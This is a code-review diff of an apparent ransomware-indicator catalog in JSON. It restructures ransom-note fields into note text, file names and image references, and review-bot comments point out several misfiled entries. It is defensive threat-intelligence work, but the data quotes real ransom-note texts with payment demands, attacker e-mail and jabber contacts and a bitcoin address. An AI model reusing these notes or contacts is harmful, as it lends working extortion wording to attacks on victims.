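Review bot: In the `@@ -673,7 +695,7 @@` hunk (the `.damage` entry) the string `TtWGgOd57SvPlkgZ***\n ==========\n end of secret_key \nTo restore your files - send e-mail to damage@india.com` ends up under the renamed `ransomnotes-filenames` key, yet it is note content with line breaks and a contact address, not a file name; it should stay under `ransomnotes` — `"ransomnotes": [ "TtWGgOd57SvPlkgZ***\n ==========\n end of secret_key \nTo restore your files - send e-mail to damage@india.com" ],` — and a `ransomnotes-filenames` list should only be added once a reference names the dropped file. The rename appears to have been applied mechanically wherever the old list held a single entry, so the other single-entry renames in this commit deserve the same text-versus-filename check.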
@@ -716,7 +738,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.1 (250$)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-S0-Bop8XUgk/WLD_RVgldgI/AAAAAAAAEBU/r2LmgjTHUbMTtIKGH2pHdKfFXcUEOQdMgCLcB/s1600/lock-act2.png"
 ],
 "refs": [
@@ -733,10 +755,12 @@
 "encryption": "AES",
 "payment-method": "Bitcoin",
 "price": "0.5 - 0.7",
- "ransomnotes": [
- "https://4.bp.blogspot.com/-M2CMU8RPgqw/WLfqOCgNXrI/AAAAAAAAEGA/W-uAf30qQgoZxqRwblUcSKzYrM5QmcLfgCLcB/s1600/note-html_2.png",
+ "ransomnotes-filenames": [
 "How decrypt files.hta"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-M2CMU8RPgqw/WLfqOCgNXrI/AAAAAAAAEGA/W-uAf30qQgoZxqRwblUcSKzYrM5QmcLfgCLcB/s1600/note-html_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/"
@@ -772,7 +796,7 @@
 "meta": {
 "date": "February 2017",
 "encryption": "AES",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-hvTBarxSO8Y/WKs5kjdpgDI/AAAAAAAAD9Q/m3louiSE6xY0BcGjnWvg_NNDU6K1ok3ggCLcB/s1600/lock.jpg"
 ],
 "refs": [
@@ -793,7 +817,9 @@
 "payment-method": "Bitcoin",
 "price": "0.8 - 2",
 "ransomnotes": [
- "All of your personal information, unfortunately for you, were encrypted\nStep 1 - PAYMENT\nStep 2 - Tell us\nStep 3 - Data Recovery\nYour data and files were encrypted, unfortunately, you need our key. For the encryption each key is unique AES-256 is created on the computer. At the moment, all the files are already encrypted and the keys securely stored in an encrypted form with RSA-2048. \nOnly one way you can recover your files - make payment in Bitcoins and get our key for decryption. Do not believe in any fairy tales on the Internet, it can be circumvented if it was easy, a lot of things in the world stopped working. \nPay according to the instructions, click through the tabs, and wait for your keys. We value the market professional customer service and reputation, so will try to unlock your files as soon as possible.\nPayment Amount: 0,8 BTC\nPayment Amount: 2.1 BTC (another option)",
+ "All of your personal information, unfortunately for you, were encrypted\nStep 1 - PAYMENT\nStep 2 - Tell us\nStep 3 - Data Recovery\nYour data and files were encrypted, unfortunately, you need our key. For the encryption each key is unique AES-256 is created on the computer. At the moment, all the files are already encrypted and the keys securely stored in an encrypted form with RSA-2048. \nOnly one way you can recover your files - make payment in Bitcoins and get our key for decryption. Do not believe in any fairy tales on the Internet, it can be circumvented if it was easy, a lot of things in the world stopped working. \nPay according to the instructions, click through the tabs, and wait for your keys. 
We value the market professional customer service and reputation, so will try to unlock your files as soon as possible.\nPayment Amount: 0,8 BTC\nPayment Amount: 2.1 BTC (another option)"
+ ],
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-0D8XdlTNIsA/WLXFiBWz5II/AAAAAAAAEFQ/Hojw0BHHysUieiCnidoVwTrqXVCckLkSQCLcB/s1600/lock-screen.jpg"
 ],
 "refs": [
@@ -829,7 +855,7 @@
 "meta": {
 "date": "February 2017",
 "encryption": "AES",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-OCBIabrrZNg/WLm1RGFVKEI/AAAAAAAAEHY/1MASb-0Y7jsBlE2TzyqgknrfDhuEsNx2gCLcB/s1600/Screenshot_1.png"
 ],
 "refs": [
@@ -846,7 +872,7 @@
 "encryption": "AES-256",
 "payment-method": "Bitcoin",
 "price": "0.5",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-viZiAZr3_ns/WKrIDWEEBXI/AAAAAAAAD8c/8n1RJ9m2Odoe3bvMMmIm421NdxS-OIRzQCLcB/s1600/note_2.png"
 ],
 "refs": [
@@ -868,10 +894,12 @@
 ],
 "payment-method": "Dollars",
 "price": "500",
- "ransomnotes": [
- "https://2.bp.blogspot.com/-ehXlWPLxtR8/WKdHF_Y-MeI/AAAAAAAAD5A/KKXO-S9OtMQAcNM-IOV2ees8qKlAJ3pzACLcB/s1600/note.jpg",
+ "ransomnotes-filenames": [
 "INSTRUCCIONES.txt"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-ehXlWPLxtR8/WKdHF_Y-MeI/AAAAAAAAD5A/KKXO-S9OtMQAcNM-IOV2ees8qKlAJ3pzACLcB/s1600/note.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/02/kasiski-ransomware.html",
 "https://twitter.com/MarceloRivero/status/832302976744173570",
@@ -915,9 +943,11 @@
 ".CRYPTOSHIELD (The name is first changed using ROT-13, and after a new extension is added.)"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "# RESTORING FILES #.txt",
- "# RESTORING FILES #.html",
+ "# RESTORING FILES #.html"
+ ],
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-A-N9zQgZrhE/WJHAHzuitvI/AAAAAAAADhI/AHkLaL9blZgqQWc-sTevVRTxVRttbugoQCLcB/s1600/note-2.png"
 ],
 "refs": [
@@ -938,11 +968,15 @@
 ],
 "payment-method": "Email - Bitcoin",
 "ransomnotes": [
- "https://4.bp.blogspot.com/-nzY6thZOXSk/WKbYmWxa0rI/AAAAAAAAD3s/t_3d90FGOe8je8rfeeYLF1jzJinG5JMVgCLcB/s1600/note_2_2.png",
- "https://3.bp.blogspot.com/-Yisae5e5Pjs/WKbXmIXU8YI/AAAAAAAAD3g/WZs5XzL4l4snT2j4yfc3CAaF7KonH_DQACLcB/s1600/note_1.png",
- "DECRYPT_INFORMATION.html",
 "UNIQUE_ID_DO_NOT_REMOVE"
 ],
+ "ransomnotes-filenames": [
+ "DECRYPT_INFORMATION.html"
+ ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-nzY6thZOXSk/WKbYmWxa0rI/AAAAAAAAD3s/t_3d90FGOe8je8rfeeYLF1jzJinG5JMVgCLcB/s1600/note_2_2.png",
+ "https://3.bp.blogspot.com/-Yisae5e5Pjs/WKbXmIXU8YI/AAAAAAAAD3g/WZs5XzL4l4snT2j4yfc3CAaF7KonH_DQACLcB/s1600/note_1.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/02/hermes-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-17th-2017-live-hermes-reversing-and-scada-poc-ransomware/",
@@ -970,7 +1004,7 @@
 "extensions": [
 ".hasp"
 ],
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-YdCKWLUFBOo/WKRCD2BLzTI/AAAAAAAAD14/BPtYMLvQpEMAbT-ZdiCVPi_LZCrXYJMhwCLcB/s1600/ReadME%2521.txt.jpg"
 ],
 "refs": [
@@ -990,7 +1024,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.1",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-iUq492KUatk/WKH-GXnO4-I/AAAAAAAADzw/9uwo1LF5ciIvMJ6jAn3mskSqtdiTkxvlACLcB/s1600/lock-note.jpg"
 ],
 "refs": [
@@ -1007,7 +1041,7 @@
 "encryption": "AES",
 "payment-method": "Bitcoin",
 "price": "0,3169",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-_Udncaac_gM/WKROBN00ORI/AAAAAAAAD2U/HsHkEspG85YSfPg-8MbPYYTYmBU4PAJAgCLcB/s1600/note_2.png",
 "https://4.bp.blogspot.com/-Vx9ZtCODajg/WKiMr2QX5cI/AAAAAAAAD64/QAh37o_CRIImaxUfIhoEh8qE4JLn5HaNwCLcB/s1600/dumb.jpg"
 ],
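Review bot: In the `@@ -938,11 +968,15 @@` hunk `UNIQUE_ID_DO_NOT_REMOVE` is left in `ransomnotes` while `DECRYPT_INFORMATION.html` moves to `ransomnotes-filenames`; by its form it looks like the name of a file the malware drops rather than note text, so if the linked references confirm that, move it next to `DECRYPT_INFORMATION.html` (`"ransomnotes-filenames": [ "DECRYPT_INFORMATION.html", "UNIQUE_ID_DO_NOT_REMOVE" ],`) and drop the then-empty `ransomnotes` list. As committed, the entry's note list contains no note text at all, which is the opposite of what the new key split is meant to guarantee.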
@@ -1048,7 +1082,7 @@
 ],
 "payment-method": "Dollars",
 "price": "249",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-ahpZEI1FHQM/WJd7_dpYlyI/AAAAAAAADm8/4-nFXqc9bjEI93VDJRdsLSlBOwQiaM7swCLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -1067,10 +1101,12 @@
 ".yourransom"
 ],
 "payment-method": "Email",
- "ransomnotes": [
- "https://4.bp.blogspot.com/-dFQlF_6uTkI/WJYigC5GwiI/AAAAAAAADlk/jm-ZwqJ2mVYd2gtAQgYW_lOd78u5N2x0ACLcB/s1600/note_2.png",
+ "ransomnotes-filenames": [
 "README.txt"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-dFQlF_6uTkI/WJYigC5GwiI/AAAAAAAADlk/jm-ZwqJ2mVYd2gtAQgYW_lOd78u5N2x0ACLcB/s1600/note_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html",
 "https://www.bleepingcomputer.com/news/security/yourransom-is-the-latest-in-a-long-line-of-prank-and-educational-ransomware/",
@@ -1087,7 +1123,7 @@
 "encryption": "AES-256",
 "payment-method": "Bitcoin",
 "price": "0.6 - 0.95",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-ORiqmM6oWXc/WJV7X4IvTWI/AAAAAAAADlE/wXvz5Hsv1gQ-UrLoA1plVjLTVD7iDDxwQCLcB/s1600/buy_2.png"
 ],
 "refs": [
@@ -1107,10 +1143,12 @@
 ".potato"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "How to recover my files.txt",
 "README.png",
- "README.html",
+ "README.html"
+ ],
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-E9GDxEoz95k/WIop79nWZ2I/AAAAAAAADZU/CnsvOl96yesoH07BZ2Q05Fp40kLcTMmqQCLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -1130,11 +1168,15 @@
 ],
 "payment-method": "Email",
 "ransomnotes": [
+ "Your files are encrypted! To decrypt write on email - opentoyou@india.comIdentification key - 5E1C0884"
+ ],
+ "ransomnotes-filenames": [
 "!!!.txt",
 "1.bmp",
- "1.jpg",
- "https://3.bp.blogspot.com/-RPeHrC9Trqk/WGk1kQlBQQI/AAAAAAAAC6o/FutnWrlUf44hq54_xI_6Uz2migCR0rwlwCLcB/s1600/Note-wallp.jpg",
- "Your files are encrypted! To decrypt write on email - opentoyou@india.comIdentification key - 5E1C0884"
+ "1.jpg"
+ ],
+ "ransomnotes-refs": [
+ "https://3.bp.blogspot.com/-RPeHrC9Trqk/WGk1kQlBQQI/AAAAAAAAC6o/FutnWrlUf44hq54_xI_6Uz2migCR0rwlwCLcB/s1600/Note-wallp.jpg"
 ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html"
@@ -1154,10 +1196,14 @@
 "payment-method": "Bitcoin",
 "price": "0.25",
 "ransomnotes": [
- "YOUR FILES ARE ENCRYPTED!!!.txt",
- "https://2.bp.blogspot.com/-uIb_TdWTk3Q/WI2qRSlsXJI/AAAAAAAADcE/h92XEY6AraQMUwEIOBZ9moxN1J2So8xpwCLcB/s1600/note_2.png",
 "YOUR FILES ARE ENCRYPTED!!! To restore (decrypt) them you must:\n1. Pay 0.25 bitcoin (btc) to address 36QLSB*** You can get BTC on this site http://localbitcoins.com \n2. After payment you must send Bitcoin Transacation ID to E-mail: andresaha82@gmail.com Then we will send you decryption tool."
 ],
+ "ransomnotes-filenames": [
+ "YOUR FILES ARE ENCRYPTED!!!.txt"
+ ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-uIb_TdWTk3Q/WI2qRSlsXJI/AAAAAAAADcE/h92XEY6AraQMUwEIOBZ9moxN1J2So8xpwCLcB/s1600/note_2.png"
+ ],
 "refs": [
 "http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html",
 "https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html",
@@ -1179,9 +1225,11 @@
 "payment-method": "Bitcoin",
 "price": "0.2",
 "ransomnotes": [
- "How decrypt files.hta",
 "Your files are encrypted! Your personal ID764F6A6664514B414373673170615339554A534A5832546A55487169644B4A35 Discovered a serious vulnerability in your network security. No data was stolen and no one will be able to do it while they are encrypted. For you we have automatic decryptor and instructions for remediation. How to get the automatic decryptor : \n1) Pay 0,25 BTC Buy BTC on one of these sites: https://localbitcoins.com https://www.coinbase.com https://xchange.cc bitcoin adress for pay: 1KG8rWYWRYHfvjVe8ddEyJNCg6HxVWYSQm Send 0,25 BTC \n2) Send screenshot of payment to unCrypte@outlook.com. In the letter include your personal ID (look at the beginning of this document). \n3) You will receive automatic decryptor and all files will be restored \n* To be sure in getting the decryption, you can send one file (less than 10MB) to unCrypte@outlook.com In the letter include your personal ID (look at the beginning of this document). But this action will increase the cost of the automatic decryptor on 0,25 btc... \nAttention! \n• No Payment = No decryption \n• You really get the decryptor after payment \n• Do not attempt to remove the program or run the anti-virus tools \n• Attempts to self-decrypting files will result in the loss of your data \n• Decoders other users are not compatible with your data, because each user's unique encryption key"
 ],
+ "ransomnotes-filenames": [
+ "How decrypt files.hta"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html",
 "https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/",
@@ -1232,9 +1280,11 @@
 "payment-method": "Bitcoin",
 "price": "0,65806",
 "ransomnotes": [
- "note.iti",
 "Important Information!!!! You had bad luck. All your files are encrypted with RSA and AES ciphers. to get your files back read carefully. if you do not understand, Read again. All your documents are recoverable only with our software and key file. To decrypt files you need to contact worldfunfact@sigaint.org or funfacts11@tutanota.com and set your ID as email title and send clsign.dll file from your computer. That is the key file and yes, it’s encrypted. Search your computer for filename “clsign.dll” attach it to email. if you wish we will decrypt one of your encrypted file for free! It’s your guarantee. After you made payment you will receive decryption software with key and necessary instructions. if you don’t contact us within 72 hours we will turn on sanctions. you’ll have to pay more. Recovery is only possible during 7 days. after that don’t contact us. Remember you are just single payment away from all your files If your files are urgent pay exactly requested amount to Bitcoin (BTC) address and send clsign.dll file to us. We will send your decryption software within 24 hours; remember if you contact us first maybe you’ll have to pay less\nUser ID: 658061***\nBTC Address: 1AQrj***\nAmount(BTC): 1.65806\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion:\nGnuPG\nv2\n*******************************\n-----END PGP PUBLIC KEY BLOCK-----"
 ],
+ "ransomnotes-filenames": [
+ "note.iti"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/funfact.html",
 "http://www.enigmasoftware.com/funfactransomware-removal/"
@@ -1252,12 +1302,14 @@
 ".<7_random_letters>"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "encrypted_readme.txt",
 "__encrypted_readme.txt",
- "https://2.bp.blogspot.com/-CLo4JTpveKY/WI4sVXEQSPI/AAAAAAAADcU/n8qrwehDEQMlG845cjNow_fC4PDqlvPIQCLcB/s1600/note_2.png",
 "WARNING! Your personal files are encrypted! Your most important files on this computer have been encrypted: photos, documents, videos, music, etc. You can verify this by trying to open such files. Encryption was produced using an UNIQUE public RSA-4096 key, specially generated for this computer only, thus making it impossible to decrypt such files without knowing private key and comprehensive decipher software. We have left on our server a copy of the private key, along with all required software for the decryption. To make sure that software is working as intended you have a possibility to decrypt one file for free, see contacts below. The private key will be destroyed after 7 days, afterwards making it impossible to decrypt your files. Encryption date: *** Private key destruction date: *** For obtaining decryption software, please, contact: myserverdoctor@gmail.com or XMPP jabber: doctordisk@jabbim.com"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-CLo4JTpveKY/WI4sVXEQSPI/AAAAAAAADcU/n8qrwehDEQMlG845cjNow_fC4PDqlvPIQCLcB/s1600/note_2.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/06/zekwacrypt-ransomware.html",
 "http://www.2-spyware.com/remove-zekwacrypt-ransomware-virus.html"
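Review bot: In the `@@ -1252,12 +1302,14 @@` hunk the long `WARNING! Your personal files are encrypted! …` text stays inside the list that was renamed to `ransomnotes-filenames`, next to `encrypted_readme.txt` and `__encrypted_readme.txt`; only the two file names belong there, and the note body should go under a `ransomnotes` key as the other entries in this commit do. As committed, anyone iterating `ransomnotes-filenames` for file-name indicators receives a multi-sentence string carrying an e-mail address and a jabber ID. Proposed: keep `"ransomnotes-filenames": [ "encrypted_readme.txt", "__encrypted_readme.txt" ],` and add `"ransomnotes": [ "WARNING! Your personal files are encrypted! … doctordisk@jabbim.com" ],` holding the full text.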
@@ -1276,11 +1328,13 @@
 ],
 "payment-method": "Bitcoin",
 "price": "2,15555 (2000$)",
- "ransomnotes": [
- "https://2.bp.blogspot.com/-6YhxRaqa_9Q/WISA9dW31bI/AAAAAAAADUE/78mNNKpPMyc2Gzi1N9CooyQp7RNT40NNgCLcB/s1600/note1_2.png",
- "https://1.bp.blogspot.com/-_c5vGu4nCvE/WIT_pWP_FSI/AAAAAAAADUs/8hK8a4E48sY3U_aAHC2qNzYDBL0bQcNjgCLcB/s1600/note-wallp111.png",
+ "ransomnotes-filenames": [
 "!Recovery_[3_random_chars].html"
 ],
+ "ransomnotes-refs": [
+ "https://2.bp.blogspot.com/-6YhxRaqa_9Q/WISA9dW31bI/AAAAAAAADUE/78mNNKpPMyc2Gzi1N9CooyQp7RNT40NNgCLcB/s1600/note1_2.png",
+ "https://1.bp.blogspot.com/-_c5vGu4nCvE/WIT_pWP_FSI/AAAAAAAADUs/8hK8a4E48sY3U_aAHC2qNzYDBL0bQcNjgCLcB/s1600/note-wallp111.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/sage-2-ransomware.html",
 "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
@@ -1298,8 +1352,10 @@
 "date": "January 2017",
 "encryption": "AES",
 "payment-method": "Bitcoin",
- "ransomnotes": [
- "Warning警告.html",
+ "ransomnotes-filenames": [
+ "Warning警告.html"
+ ],
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-OTxFEWf7LiY/WIO0rJmBgJI/AAAAAAAADTQ/U3BLcd2-CPQQ_73eIKIyg28cKFmw4nctgCLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -1321,7 +1377,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-llR46G5zOBE/WIJuTTHImXI/AAAAAAAADS8/Ww_QU1Z7Q3geZgiSStJB3siO3oQJpIcowCLcB/s1600/note.jpg",
 "https://4.bp.blogspot.com/-ilIaUD5qOuk/WIJuV1TuC1I/AAAAAAAADTA/SOj8St_qXMsgDexK1BGgZT0yFDkNDz_7QCLcB/s1600/lock.jpg"
 ],
@@ -1345,8 +1401,10 @@
 ],
 "payment-method": "Bitcoin",
 "price": "1",
- "ransomnotes": [
- "HOW_OPEN_FILES.html",
+ "ransomnotes-filenames": [
+ "HOW_OPEN_FILES.html"
+ ],
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-w6lxK0qHj8A/WIO_iAngUzI/AAAAAAAADTk/dLGlrwwOh508AlG2ojLRszpUxL0tHrtSQCLcB/s1600/note-html.jpg"
 ],
 "refs": [
@@ -1366,10 +1424,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.1 - your choice",
- "ransomnotes": [
- "https://1.bp.blogspot.com/-5BgSHIym-8Y/WIH92q4ymHI/AAAAAAAADSk/MF2T-mmhuY4irQZFqmpGZjmUI2onlNCyACLcB/s1600/ransom-note.png",
+ "ransomnotes-filenames": [
 "HELP_DECRYPT_FILES.html"
 ],
+ "ransomnotes-refs": [
+ "https://1.bp.blogspot.com/-5BgSHIym-8Y/WIH92q4ymHI/AAAAAAAADSk/MF2T-mmhuY4irQZFqmpGZjmUI2onlNCyACLcB/s1600/ransom-note.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html",
 "https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/",
@@ -1400,7 +1460,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "150 $",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-Xs7yigomWw8/WH0mqn0QJLI/AAAAAAAADKA/0Fk5QroMsgQ3AsXbHsbVtopcJN4qzDgdACLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -1423,9 +1483,11 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "IMPORTANTE_LEER.html",
- "RECUPERAR_ARCHIVOS.html",
+ "RECUPERAR_ARCHIVOS.html"
+ ],
+ "ransomnotes-refs": [
 "https://3.bp.blogspot.com/-KE6dziEK4To/WHnvPzKOs7I/AAAAAAAADHI/KPBjmO9iChgAa12-f1VOxF49Pv27-0XfQCLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -1447,9 +1509,11 @@
 "payment-method": "Bitcoin",
 "price": "1",
 "ransomnotes": [
- "https://4.bp.blogspot.com/-v3jncd77m3U/WHkjPoEusKI/AAAAAAAADGE/xJOIgzm-ST0L4kpNeThKTyfukq3e1Th-QCLcB/s1600/troll-22.png",
 "You have been struck by the holy Kaandsona ransomware Either you pay 1 BTC in 24 hours or you lose ALL FILES \nbutton 'Show all encrypted files' \nbutton 'PAY'"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-v3jncd77m3U/WHkjPoEusKI/AAAAAAAADGE/xJOIgzm-ST0L4kpNeThKTyfukq3e1Th-QCLcB/s1600/troll-22.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html",
 "https://twitter.com/BleepinComputer/status/819927858437099520"
@@ -1472,8 +1536,10 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.5 - 1",
- "ransomnotes": [
- "READ_IT.hTmL",
+ "ransomnotes-filenames": [
+ "READ_IT.hTmL"
+ ],
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-B3o6bGziu_M/WHkyueI902I/AAAAAAAADGw/la7psCE9JEEe17GipFh69xVnIDYGFF38wCLcB/s1600/note-1-2.gif"
 ],
 "refs": [
@@ -1493,8 +1559,10 @@
 ".HakunaMatata"
 ],
 "payment-method": "Website (onion)",
- "ransomnotes": [
- "Recovers files yako.html",
+ "ransomnotes-filenames": [
+ "Recovers files yako.html"
+ ],
+ "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-DUXeyyzqwKs/WHkrGvLyFvI/AAAAAAAADGg/SPfrNMZYGs8edE7X5z-3MBroIqS5GQ8kACLcB/s1600/note_1-str_2.png"
 ],
 "refs": [
@@ -1518,11 +1586,13 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.2",
- "ransomnotes": [
- "https://4.bp.blogspot.com/-7UmhPM2VSKY/WHe5tDsHfuI/AAAAAAAADFM/FRdUnAyxAggvF0hX0adtrpq48F7HXPbawCLcB/s1600/check-decrypt.png",
- "https://1.bp.blogspot.com/-MWRTa6aXtdk/WHflJFyb-GI/AAAAAAAADFs/dc-l-RrWSCAPE8akw2SCb1uuj-a-2shiwCLcB/s1600/docm.png",
+ "ransomnotes-filenames": [
 "_HELP_Recover_Files_.html"
 ],
+ "ransomnotes-refs": [
+ "https://4.bp.blogspot.com/-7UmhPM2VSKY/WHe5tDsHfuI/AAAAAAAADFM/FRdUnAyxAggvF0hX0adtrpq48F7HXPbawCLcB/s1600/check-decrypt.png",
+ "https://1.bp.blogspot.com/-MWRTa6aXtdk/WHflJFyb-GI/AAAAAAAADFs/dc-l-RrWSCAPE8akw2SCb1uuj-a-2shiwCLcB/s1600/docm.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2017/01/marlboro.html",
 "https://decrypter.emsisoft.com/marlboro",
@@ -1539,10 +1609,12 @@ "encryption": "AES+RSA", "payment-method": "Bitcoin", "price": "79$", - "ransomnotes": [ - "https://1.bp.blogspot.com/-0COE3ADdaYk/WHpnHzuo7OI/AAAAAAAADHY/yfDF3XG720Yyn3xQHwFngt1T99cT-Xt3wCLcB/s1600/rus-note_2.png", + "ransomnotes-filenames": [ "[Infection-ID].HTML" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-0COE3ADdaYk/WHpnHzuo7OI/AAAAAAAADHY/yfDF3XG720Yyn3xQHwFngt1T99cT-Xt3wCLcB/s1600/rus-note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html", "https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware", @@ -1577,7 +1649,7 @@ ], "payment-method": "Bitcoin", "price": "0.35", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-mwIvQNkFH4g/WKAydZnGn_I/AAAAAAAADxs/6xHgbD3OUFUbebeuNVkI6tp_cMRVUQHtQCLcB/s1600/note_2.png" ], "refs": [ @@ -1597,7 +1669,7 @@ ], "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-OY8jgTN5Y9Q/WKAI6a9xfMI/AAAAAAAADwc/ng36hAXsvfYQ5rdkSFeVgEvLY88pJmnWACLcB/s1600/note-html-wallp.jpg", "https://3.bp.blogspot.com/-DQQ5tk0C9lY/WKALND0dYPI/AAAAAAAADwo/EuKiO_F0Mn0ImrGLVE-Sks-j93pHoTjKACLcB/s1600/konstr.jpg" ], @@ -1618,7 +1690,7 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.33", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-5t-5eBl4Tng/WKARmYV5GVI/AAAAAAAADxA/OuS7Eo__z1sh2tRbBpQIxJQ6IVbSiQakwCLcB/s1600/lock-note.jpg" ], "refs": [ @@ -1640,7 +1712,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-kolk6sABFzQ/WJ95ddcAxNI/AAAAAAAADwI/oP8ZFD7KnqoQWgpfgEHId843x3l0xfhjACLcB/s1600/note_2.png" ], "refs": [ @@ -1662,7 +1734,7 @@ ], "payment-method": "Bitcoin", "price": "50$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Qx8RhielSbI/WJypR9Zw9nI/AAAAAAAADus/Opsfy8FxRIIBmouywdl7uT94ZpfwKr6JACLcB/s1600/note.jpg" ], "refs": [ 
@@ -1706,10 +1778,12 @@ "encryption": "ROT-23", "payment-method": "Bitcoin", "price": "0.085", - "ransomnotes": [ - "https://1.bp.blogspot.com/-tAp9wE6CJxM/WJrvOOyIfRI/AAAAAAAADts/iMfaiDRyRcQuPXgtQV--qt7q8ZI3ZV0tQCLcB/s1600/note1%252B.jpg", + "ransomnotes-filenames": [ "README.HTML" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-tAp9wE6CJxM/WJrvOOyIfRI/AAAAAAAADts/iMfaiDRyRcQuPXgtQV--qt7q8ZI3ZV0tQCLcB/s1600/note1%252B.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" @@ -1727,7 +1801,7 @@ ], "payment-method": "Bitcoin", "price": "0.085", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-7KRVg6kt418/WJnwxDOV5NI/AAAAAAAADrk/or9DbPMl-7ksN7OwIAH6BMJwE5fGc_BfgCLcB/s1600/note_2.png" ], "refs": [ @@ -1748,7 +1822,7 @@ ".cancer" ], "payment-method": "no ransom", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-ozPs6mwKfEI/WJjTwbrOx9I/AAAAAAAADqE/4gewG-f_dLQQDevajtn8CnX69lvWgCZQACLcB/s1600/wallp.jpg" ], "refs": [ @@ -1768,7 +1842,7 @@ ".locked" ], "payment-method": "Email - Bitcoin", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-BOmKmroIvEI/WJn-LAUmyyI/AAAAAAAADsI/W987TEaOnEAd45AOxO1cFyFvxEx_RfehgCLcB/s1600/note_2.png" ], "refs": [ @@ 